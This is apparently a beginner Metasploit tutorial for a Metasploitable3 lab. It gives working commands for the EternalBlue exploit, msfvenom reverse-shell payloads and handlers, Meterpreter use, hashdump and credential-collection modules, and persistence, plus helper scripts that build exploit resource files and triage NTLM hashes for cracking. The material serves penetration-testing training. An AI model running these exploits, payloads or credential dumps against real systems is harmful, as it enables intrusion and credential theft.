Metasploit Framework Tutorial 2026: Ethical Penetration Testing for Beginners
Metasploit is the most widely used penetration testing framework in the world. It ships with over 2,300 exploits, 1,100 auxiliary modules, and hundreds of payloads, all driven through a single, consistent interface. Whether you are studying for OSCP, preparing for a professional engagement, or just learning how real-world exploitation works, the msfconsole workflow is a foundational skill. This guide covers everything from launching msfconsole to running post-exploitation modules: setup on Kali Linux, Meterpreter sessions, and msfvenom payload generation, using only legal, deliberately vulnerable targets.
1. Legal and Ethical Foundation (MUST READ FIRST)
This section is not optional. Using Metasploit against systems you do not own or do not have written authorization to test is a serious crime in virtually every jurisdiction. Read this before running a single command.
The core rule
Only test systems you own or have explicit, written authorization to test. A verbal agreement is not authorization. A signed scope-of-work or rules-of-engagement document is the standard. When in doubt, get it in writing before you touch anything.
Laws that apply
- United States — Computer Fraud and Abuse Act (CFAA): Unauthorized access to a computer is a federal felony. First-time offenders have received multi-year prison sentences and six-figure fines. The CFAA is notoriously broad; "exceeding authorized access" has been prosecuted even against people who had an existing account on the target system.
- European Union — Directive 2013/40/EU and national cybercrime laws: EU member states implement the Directive on attacks against information systems, which follows the Budapest Convention on Cybercrime, through national computer misuse offences. NIS2 is a separate regime that imposes security obligations on operators and suppliers; it is not the statute an unauthorised tester is prosecuted under. Penalties are comparable to or exceed those in the U.S.
- United Kingdom — Computer Misuse Act 1990: Unauthorised access (section 1) carries up to two years' imprisonment; unauthorised acts intended to impair a computer (section 3) up to ten years; and unauthorised acts causing serious damage, for example to critical infrastructure (section 3ZA), up to 14 years, or life imprisonment where the damage threatens human life or national security.
- Australia, Canada, and most others: Similar statutes exist. The principle is universal.
Your legal practice target: Metasploitable3
All examples in this metasploit tutorial use Metasploitable3, a deliberately vulnerable virtual machine maintained by Rapid7 (the company behind Metasploit). It is designed specifically to be attacked. Using it means you will never accidentally compromise a real system while following along.
Download and setup instructions: https://github.com/rapid7/metasploitable3
Run Metasploitable3 in an isolated host-only or NAT network in VirtualBox or VMware. Never expose it to the public internet: it is vulnerable by design, and anyone who finds it gets the same SYSTEM shell you are practising for.
2. Install and Update Metasploit on Kali Linux
Metasploit comes pre-installed on Kali Linux. Before your first session, initialize the database and launch the console:
sudo msfdb init && msfconsole
msfdb init creates and starts a local PostgreSQL database that Metasploit uses to store the hosts, services, vulnerabilities, credentials and loot discovered during an engagement (open sessions themselves are not persisted). This persistent storage is what makes Metasploit practical for multi-day assessments: workspaces, hosts, services and db_nmap all depend on it. If anything looks off, db_status inside msfconsole tells you whether the console is actually connected.
To update to the latest modules and fixes:
sudo apt update && sudo apt install metasploit-framework
Rapid7 pushes updates frequently. Run this before every engagement to ensure you have the most current exploit database.
Verify your version inside msfconsole:
msf6 > version
Framework: 6.x.x-dev
Console : 6.x.x-dev
3. msfconsole Basics
msfconsole is the primary interface to Metasploit. It is an interactive shell with tab completion, command history, and a module hierarchy organized by category.
search — find modules
msf6 > search ms17-010
msf6 > search type:exploit platform:windows smb
msf6 > search cve:2021-44228
The search command queries the local module cache (rebuilt on first start after an update). You can filter by type (exploit, auxiliary, post, payload), platform, CVE, author, or any keyword. Results include a rank (Excellent, Great, Good, Normal, Average, Low, Manual) that reflects how reliably the module works and how likely it is to crash the target; Excellent means the exploit should never crash the service, which matters when you are choosing between several modules for the same bug.
use — select a module
msf6 > use exploit/windows/smb/ms17_010_eternalblue
After running use, your prompt changes to show the active module context. Everything you configure from this point applies to that module.
info — show module details
msf6 exploit(windows/smb/ms17_010_eternalblue) > info
info displays the module description, CVE references, author, reliability rating, and required options. Always read it before running an exploit — it tells you what the module does, what it requires, and any known limitations.
show options — required/optional settings
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Lists every configurable parameter: whether it is required, its current value, and a short description. Required fields with no value set will cause run to fail with a clear error.
set RHOSTS — configure the target
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.56.10
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.56.1
RHOSTS accepts a single IP, a hostname, an IP range (192.168.56.10-20), a CIDR range (192.168.56.0/24), or a file of targets (file:/path/to/targets.txt). LHOST is your attacker machine's IP, the address the payload will call back to. Metasploit pre-fills it with a guessed local address; on a machine with several interfaces or a VPN the guess is frequently wrong, so always set it explicitly to the interface the target can actually reach (here, the host-only adapter).
run / exploit
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
run and exploit are synonymous for exploit modules (auxiliary and post modules only understand run). Many exploits also implement check, which probes the target and reports whether it appears vulnerable without sending the exploit itself; run check first whenever the module supports it. Use run -j to execute the module as a background job so you can keep using the console while it runs, and add -z so Metasploit does not automatically drop you into the new session.
4. First Exploit: EternalBlue (MS17-010) on Metasploitable3
EternalBlue is the NSA-developed exploit leaked by the Shadow Brokers in 2017. It targets a buffer overflow in the Windows SMBv1 server (CVE-2017-0144, one of the bugs patched by bulletin MS17-010) and became infamous through WannaCry and NotPetya. The Windows build of Metasploitable3 is a Windows Server 2008 R2 system that is intentionally left unpatched, making this the canonical first exploit for beginners in a Kali Linux lab.
Search and select the module
msf6 > search ms17-010
You will see several results. The one to use is:
exploit/windows/smb/ms17_010_eternalblue Excellent
Set options and run
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.56.10
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.56.1
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
Catch the shell
A successful run ends with:
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.10:49XXX)
meterpreter >
You now have a Meterpreter shell on the target running as NT AUTHORITY\SYSTEM. If the exploit fails, run check to confirm the module still sees the host as vulnerable, verify that SMBv1 is enabled on the Metasploitable3 instance and that no firewall is blocking port 445, and confirm that LHOST is the address of your host-only adapter. Keep in mind that EternalBlue corrupts kernel pool memory: a failed attempt can blue-screen the target, so snapshot the VM before trying it and never run it against a production system without explicit approval for a potentially disruptive test.
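The steps above as one repeatable script, an example added here rather than code from Metasploit or Rapid7: it emits two msfconsole resource scripts, one that only runs the SMB scanner and the module's check method, and one that exploits, so the overflow is never sent before the check has said the host is vulnerable. The ms17_rc wrapper and its argument layout are this example's own; the module names, options and msfconsole flags are real.

```shell
#!/usr/bin/env bash
# Added example (not Metasploit code): generate resource scripts for the
# EternalBlue workflow, split into a check-only pass and an exploit pass.
set -eu

# $1 = check|exploit, $2 = RHOSTS, $3 = LHOST (exploit only), $4 = LPORT (default 4444)
ms17_rc() {
  local mode="${1:-}" rhosts="${2:-}" lhost="${3:-}" lport="${4:-4444}"
  if [ -z "$rhosts" ]; then
    echo "usage: ms17_rc check|exploit RHOSTS [LHOST] [LPORT]" >&2
    return 1
  fi
  case "$mode" in
    check)
      # The scanner sends only the MS17-010 probe, never the overflow; the
      # exploit module's own check is run afterwards as a second opinion.
      # exit -y quits msfconsole without the "are you sure" prompt.
      cat <<EOF
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS $rhosts
run
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS $rhosts
check
exit -y
EOF
      ;;
    exploit)
      if [ -z "$lhost" ]; then
        echo "exploit mode needs LHOST (the address the target can reach)" >&2
        return 1
      fi
      # -j backgrounds the job, -z does not auto-attach to the first session.
      cat <<EOF
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS $rhosts
set LHOST $lhost
set LPORT $lport
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit -j -z
sessions -l
EOF
      ;;
    *)
      echo "mode must be check or exploit" >&2
      return 1
      ;;
  esac
}

# Usage (lab addresses from this guide):
#   ms17_rc check   192.168.56.10              > check.rc   && msfconsole -q -r check.rc
#   ms17_rc exploit 192.168.56.10 192.168.56.1 > exploit.rc && msfconsole -q -r exploit.rc
ms17_rc check 192.168.56.10
echo "---- exploit.rc ----"
ms17_rc exploit 192.168.56.10 192.168.56.1
```

Read the output of the check pass before generating the exploit pass; the scanner and check both print a per-host verdict, and a "does not appear vulnerable" result is your cue to stop rather than to try harder.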
5. Meterpreter Sessions
Meterpreter is Metasploit's advanced post-exploitation payload. Unlike a raw command shell, the Windows Meterpreter is a reflectively loaded DLL that runs entirely in memory, encrypts its traffic after an initial key exchange, and provides a rich command set plus loadable extensions (priv, which supplies hashdump, and kiwi, which wraps Mimikatz functionality, among others) without writing files to disk.
sessions -l — list sessions
# Background the current session from inside Meterpreter:
meterpreter > background
# List all open sessions from msfconsole:
msf6 > sessions -l
Output shows the session ID, type, remote address, and the user context the payload is running as.
sessions -i 1 — interact with a session
msf6 > sessions -i 1
meterpreter >
Common Meterpreter commands
| Command | What it does |
|---|---|
| sysinfo | OS name, hostname, architecture, and the Meterpreter architecture |
| getuid | Current user context (e.g., NT AUTHORITY\SYSTEM) |
| ps | List all running processes, with PID, owner and architecture |
| migrate <PID> | Move the payload into another process for stability; do it early, because the exploited process may be unstable, and pick a long-lived process running as the same user, since the new Meterpreter inherits that process's token |
| hashdump | Dump local SAM NTLM password hashes (requires SYSTEM) |
| screenshot | Capture the current desktop as a PNG |
| upload <src> <dst> | Upload a local file to the target |
| download <src> <dst> | Download a file from the target to the attacker machine |
shell — drop to OS shell
meterpreter > shell
Process 1234 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
C:\Windows\system32>whoami
nt authority\system
Press Ctrl+Z to background the shell channel and return to the Meterpreter prompt (Metasploit asks for confirmation); type exit at the cmd.exe prompt to terminate the channel instead. The version banner above is what Metasploitable3's Windows Server 2008 R2 build reports.
6. Payloads with msfvenom
msfvenom is Metasploit's standalone payload generator. It lets you create standalone executables, shellcode, scripts, and more for situations where you need to deliver a payload outside of a direct exploit. This section is the core of the msfvenom tutorial.
Generate a Windows reverse shell
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.56.1 \
LPORT=4444 \
-f exe \
-o payload.exe
- -p specifies the payload. windows/x64/meterpreter/reverse_tcp is a staged payload: a small stager connects back to your listener and downloads the full Meterpreter stage.
- LHOST and LPORT are the attacker's listening address and port.
- -f exe outputs a Windows PE executable. Other formats include elf, raw, python, powershell, dll, and jar.
- -o payload.exe writes the output to a file.
Other useful formats
# Linux ELF binary
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f elf -o shell.elf
# Raw shellcode in C array format
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f c
# PowerShell one-liner
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f psh-cmd
Set up the listener with exploit/multi/handler
Before delivering the payload, start a handler to catch the incoming connection:
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.56.1
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > run -j
run -j starts the handler as a background job. When the payload executes on the target, Metasploit prints a session notification and you can interact with it using sessions -i <id>. PAYLOAD, LHOST and LPORT must match exactly what you passed to msfvenom: a staged stager that reaches a handler configured for a different payload receives the wrong stage and dies silently. By default the handler stops listening after the first session; set ExitOnSession false before run -j if you expect more than one callback.
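The payload and handler mismatch described above is easiest to avoid by generating both sides from one set of variables. The script below is an added example, not part of Metasploit or this guide's original text: the payload_name, venom_command and handler_rc helpers are this example's own, while the payload names, msfvenom flags and handler options they emit are real. It also covers the staged versus stageless naming from the FAQ (a slash versus an underscore before reverse_tcp).

```shell
#!/usr/bin/env bash
# Added example (not part of Metasploit): derive the msfvenom command and the
# matching multi/handler resource script from one set of variables, so the
# payload, LHOST and LPORT can never drift apart between the two.
set -eu

# Meterpreter naming: staged payloads use '/' between "meterpreter" and the
# transport (meterpreter/reverse_tcp); stageless ones use '_' (meterpreter_reverse_tcp).
payload_name() {   # $1 = windows|linux, $2 = staged|stageless
  local os="$1" mode="$2" sep
  case "$mode" in
    staged)    sep='/' ;;
    stageless) sep='_' ;;
    *) echo "mode must be staged or stageless, got '$mode'" >&2; return 1 ;;
  esac
  case "$os" in
    windows) echo "windows/x64/meterpreter${sep}reverse_tcp" ;;
    linux)   echo "linux/x64/meterpreter${sep}reverse_tcp" ;;
    *) echo "unsupported os '$os'" >&2; return 1 ;;
  esac
}

# Output format follows the target OS: PE executable for Windows, ELF for Linux.
output_format() { case "$1" in windows) echo exe ;; linux) echo elf ;; esac; }

# Reject anything that is not a plain integer in 1-65535.
valid_port() {
  case "$1" in ''|*[!0-9]*) return 1 ;; esac
  if [ "$1" -ge 1 ] && [ "$1" -le 65535 ]; then return 0; fi
  return 1
}

# The msfvenom invocation.  $1 os, $2 mode, $3 LHOST, $4 LPORT, $5 output file
venom_command() {
  local p
  p="$(payload_name "$1" "$2")" || return 1
  valid_port "$4" || { echo "bad LPORT '$4'" >&2; return 1; }
  printf 'msfvenom -p %s LHOST=%s LPORT=%s -f %s -o %s\n' \
    "$p" "$3" "$4" "$(output_format "$1")" "$5"
}

# The listener, as a resource script for "msfconsole -q -r handler.rc".
# ExitOnSession false keeps the handler alive for more than one callback;
# -j -z backgrounds it and does not auto-attach to the first session.
handler_rc() {   # $1 os, $2 mode, $3 LHOST, $4 LPORT
  local p
  p="$(payload_name "$1" "$2")" || return 1
  valid_port "$4" || { echo "bad LPORT '$4'" >&2; return 1; }
  cat <<EOF
use exploit/multi/handler
set PAYLOAD $p
set LHOST $3
set LPORT $4
set ExitOnSession false
exploit -j -z
EOF
}

# Usage: one source of truth for both sides (lab addresses from this guide).
LHOST=192.168.56.1
LPORT=4444
venom_command windows staged "$LHOST" "$LPORT" payload.exe
echo "# handler.rc:"
handler_rc windows staged "$LHOST" "$LPORT"
```

Switching the second argument to stageless changes both the msfvenom -p value and the handler's PAYLOAD together, which is exactly the pair that gets out of step when the two commands are typed by hand.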
7. Post-Exploitation Modules
Once you have a Meterpreter session, Metasploit's post modules automate common post-exploitation tasks. They run against an existing session rather than launching a new exploit.
run post/multi/recon/local_exploit_suggester
meterpreter > run post/multi/recon/local_exploit_suggester
This module runs the check methods of Metasploit's local privilege escalation exploits against the session and lists the ones that report the host as likely vulnerable. It is one of the first modules to run after gaining initial access, but its output is a list of leads to verify, not confirmed findings: many check methods are version-based and produce false positives and negatives. On Metasploitable3 you are already SYSTEM after EternalBlue; the suggester earns its keep after a low-privilege foothold.
run post/windows/gather/hashdump
meterpreter > run post/windows/gather/hashdump
Dumps the NTLM password hashes from the Windows SAM database in pwdump format (user:RID:LM hash:NT hash:::). Requires SYSTEM-level privileges; the results are also stored in the database as loot and credentials. The NT hashes can be fed directly into hashcat in mode 1000 (NTLM) for offline cracking — see our Hashcat tutorial for the next steps.
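Before handing a dump to hashcat, a practitioner triages it: drops accounts with the empty-password hash (nothing to crack, but a finding in itself), flags accounts that share an NT hash (same hash means same password), and separates any account that still has a real LM hash, which is far weaker and worth cracking first in hashcat mode 3000. The script below is an added example, not Metasploit code or the guide's own; the hashdump lines it works on are constructed to look like a Metasploitable3 dump and are not a real capture, and the helper names are this example's own.

```shell
#!/usr/bin/env bash
# Added example (not Metasploit code): triage hashdump output for hashcat.
# Metasploit prints one account per line in pwdump format:
#     user:RID:LM_hash:NT_hash:::
set -eu

EMPTY_NT="31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password
EMPTY_LM="aad3b435b51404eeaad3b435b51404ee"   # LM field when LM storage is disabled

# Constructed sample shaped like a Metasploitable3 dump; not a real capture.
# The last line mimics module status output mixed into a pasted dump.
SAMPLE_HASHDUMP='Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
sshd_server:1001:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035:::
legacy:1002:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
[*] not a hash line, e.g. module status output'

# Keep only well-formed lines whose NT field is 32 lowercase hex characters.
well_formed() {
  awk -F: 'NF >= 4 && length($4) == 32 && $4 ~ /^[0-9a-f]+$/'
}

# user:NT_hash lines for "hashcat -m 1000 --username"; empty-password accounts
# are dropped because there is nothing to crack.
hashdump_to_hashcat() {
  well_formed | awk -F: -v empty="$EMPTY_NT" '$4 != empty { print $1 ":" $4 }'
}

# NT hashes used by more than one account: cracking one cracks them all, and
# the reuse itself is a reportable finding.  Output: "<hash> user,user".
shared_nt_hashes() {
  well_formed | awk -F: -v empty="$EMPTY_NT" '
    $4 != empty {
      users[$4] = (users[$4] == "" ? $1 : users[$4] "," $1)
      count[$4]++
    }
    END { for (h in count) if (count[h] > 1) print h " " users[h] }'
}

# Accounts that still store a real LM hash (case-insensitive, two 7-char
# halves): crack these first with hashcat -m 3000, then reuse the result.
lm_hash_accounts() {
  well_formed | awk -F: -v nolm="$EMPTY_LM" '$3 != nolm && length($3) == 32 { print $1 }'
}

# Accounts with an empty password, reported rather than cracked.
empty_password_accounts() {
  well_formed | awk -F: -v empty="$EMPTY_NT" '$4 == empty { print $1 }'
}

echo "== hashcat -m 1000 --username input =="
printf '%s\n' "$SAMPLE_HASHDUMP" | hashdump_to_hashcat
echo "== password reuse (hash user,user) =="
printf '%s\n' "$SAMPLE_HASHDUMP" | shared_nt_hashes
echo "== LM hashes present (hashcat -m 3000) =="
printf '%s\n' "$SAMPLE_HASHDUMP" | lm_hash_accounts
echo "== empty passwords =="
printf '%s\n' "$SAMPLE_HASHDUMP" | empty_password_accounts
```

Feed the first section to hashcat with --username so the user:hash layout is accepted and cracked passwords come back mapped to accounts; the other three sections go straight into the report.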
Other useful post modules
# Enumerate installed applications
run post/windows/gather/enum_applications
# Dump saved browser and application credentials
run post/windows/gather/credentials/credential_collector
# Enumerate network shares
run post/windows/gather/enum_shares
# Enumerate environment variables
run post/multi/gather/env
Run search type:post in msfconsole to browse the full list. There are over 300 post-exploitation modules covering everything from persistence mechanisms to Active Directory enumeration.
8. Metasploit vs. Manual Exploitation
Metasploit is a productivity tool, not a replacement for understanding what is actually happening on the wire. Knowing when to use it — and when not to — separates effective penetration testers from script kiddies.
Use Metasploit when:
- The target matches a known CVE with a reliable module (Excellent or Great rank).
- You need to move quickly through a large scope and document findings reproducibly.
- You want Meterpreter's feature-rich post-exploitation environment — it takes months to replicate manually with custom tooling.
- The engagement authorizes it and speed matters more than stealth.
Write custom exploits when:
- No public module exists for the vulnerability.
- The Metasploit module fails because of minor version differences or non-standard configurations.
- You are targeting a zero-day or a proprietary protocol.
- AV/EDR detects and blocks Metasploit's well-known payloads. Out-of-the-box Metasploit signatures are widely detected by modern endpoint protection. Custom shellcode and loaders are required in mature environments.
- You need to deeply understand the vulnerability — for a CVE submission, a research report, or OSCP exam machines where Metasploit is restricted to a single use.
In professional engagements, a realistic workflow is: use Metasploit to quickly confirm exploitability and get initial access, then pivot to custom tooling for stealth and lateral movement if the environment has active detection capabilities.
9. FAQ
Q: Is Metasploit legal to use? Yes — on systems you own or are authorized to test. The framework itself is legal open-source software. The legality depends entirely on what you point it at.
Q: Does Metasploit work on modern, patched Windows 11 systems? EternalBlue and many classic exploits do not — they rely on unpatched vulnerabilities. Modern assessments focus on misconfigurations, weak credentials, and application-layer issues. Metasploit has extensive auxiliary and post-exploitation modules for these scenarios.
Q: What is the difference between a staged and a stageless payload? A staged payload (e.g., windows/x64/meterpreter/reverse_tcp) is a small stager that connects back to the handler and receives the full Meterpreter stage over that same outbound connection; the generated binary is tiny, but it only works against a Metasploit handler configured with the matching staged payload. A stageless payload (e.g., windows/x64/meterpreter_reverse_tcp) embeds the whole Meterpreter in the generated binary. It is larger, but nothing is transferred after the connection opens, which helps when the stage download would be caught by network inspection or when the channel is slow or unreliable. In either case the handler's PAYLOAD must match what msfvenom generated.
Q: msfvenom says "No platform was selected, choosing Msf::Module::Platform::Windows." Is that a problem? No. It is Metasploit inferring the platform from the payload selection and confirming its assumption. The payload generates correctly.
Q: How do I persist a Meterpreter session across a reboot? Use run post/windows/manage/persistence_exe or run post/linux/manage/cron_persistence depending on the target OS. Persistence mechanisms are highly detectable and should only be used in scoped engagements where persistence is explicitly part of the authorized test plan. Remove all artifacts when the engagement ends.
Q: What is the difference between Metasploit Framework and Metasploit Pro? Metasploit Framework is open source (BSD 3-Clause license) and is what ships on Kali Linux. Metasploit Pro is a commercial product from Rapid7 that adds a web GUI, automated reporting, phishing campaign management, and enterprise workflow features. For learning and most professional use, the free Framework is sufficient.
Q: What certifications use Metasploit? OSCP (Offensive Security Certified Professional) permits Metasploit for one machine during the exam. eJPT (eLearnSecurity Junior Penetration Tester) and PNPT (Practical Network Penetration Tester) both cover Metasploit extensively in their curricula.
Next Steps
- Work through the full Metasploitable3 challenge — it has 20+ intentional vulnerabilities across SMB, web apps, databases, and services. Each one gives you practice with a different module type.
- Study the Offensive Security PEN-200 curriculum if you are targeting OSCP. OSCP restricts Metasploit to one machine per exam, so building manual exploitation skills alongside Metasploit knowledge is essential.
- Pair Metasploit with Nmap — see our Nmap tutorial for reconnaissance techniques. Feed scan results directly into Metasploit's database using db_nmap.
- After dumping hashes with hashdump, head to our Hashcat tutorial to learn offline password cracking.
- Read Metasploit Unleashed — Offensive Security's free, comprehensive Metasploit course — once you are comfortable with the basics covered here.